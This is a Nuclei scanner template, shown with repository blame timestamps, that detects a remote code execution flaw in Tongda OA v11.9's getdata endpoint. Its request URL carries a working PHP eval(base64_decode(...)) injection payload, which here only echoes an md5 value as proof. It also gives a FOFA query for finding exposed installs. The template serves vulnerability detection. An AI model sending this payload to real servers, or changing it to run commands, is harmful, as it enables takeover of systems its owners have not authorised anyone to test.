nuclei-templates/http/vulnerabilities/tongda/tongda-getdata-rce.yaml

41 lines
1.5 KiB
YAML
Raw Normal View History

2023-09-06 19:45:50 +00:00
id: tongda-getdata-rce
info:
2023-09-14 19:11:38 +00:00
name: Tongda OA v11.9 getadata - Remote Code Execution
2023-09-06 19:45:50 +00:00
author: SleepingBag945
severity: critical
description: |
There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
classification:
cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
2023-09-06 19:45:50 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-09-14 19:11:38 +00:00
fofa-query: app="TDXK-通达OA"
2024-09-10 08:22:50 +00:00
product: office_anywhere
vendor: tongda2000
2023-09-06 19:45:50 +00:00
tags: tongda,rce
2023-09-06 19:45:50 +00:00
variables:
2023-09-14 19:11:38 +00:00
num: '999999999'
payload: "echo md5({{num}});"
2023-09-06 19:45:50 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"
2023-09-14 19:11:38 +00:00
matchers-condition: and
2023-09-06 19:45:50 +00:00
matchers:
2023-09-14 19:11:38 +00:00
- type: word
words:
- '{{md5(num)}}'
- 'pagelimit'
condition: and
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
2024-09-12 05:14:01 +00:00
# digest: 490a0046304402201d4d1cf96bacfec200fd062855774209a58f8f1848f14d54ed6cb26a16d187f902203e40e4d1b680c4d60704889b34d9494425a570c472554ded330db8863435fdad:922c64590222798bb761d5b6d8e72950